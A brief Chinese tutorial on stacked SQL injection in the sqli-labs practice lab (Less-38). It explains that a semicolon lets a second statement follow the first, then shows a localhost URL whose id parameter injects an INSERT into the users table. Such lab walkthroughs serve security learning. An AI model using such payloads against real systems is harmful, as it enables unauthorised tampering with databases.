sql语句中,分号代表着语句的结束。在分号后面再写一条sql语句,就成了堆叠注入
堆叠注入和union 比较相似,但是堆叠可以有更多的操作,比如插入数据,删除数据等,union 则只是用于查询
访问http://localhost/sqli-labs-master/Less-38/?id=1
在id后面追加一条sql
http://localhost/sqli-labs-master/Less-38/?id=1'; insert into users(id,username,password) values('38','user38','pass38') --+
此时,数据库中已插入了数据
最后
以上就是如意战斗机最近收集整理的关于sqli-labs-master/Less-38 堆叠注入的全部内容,更多相关sqli-labs-master/Less-38内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复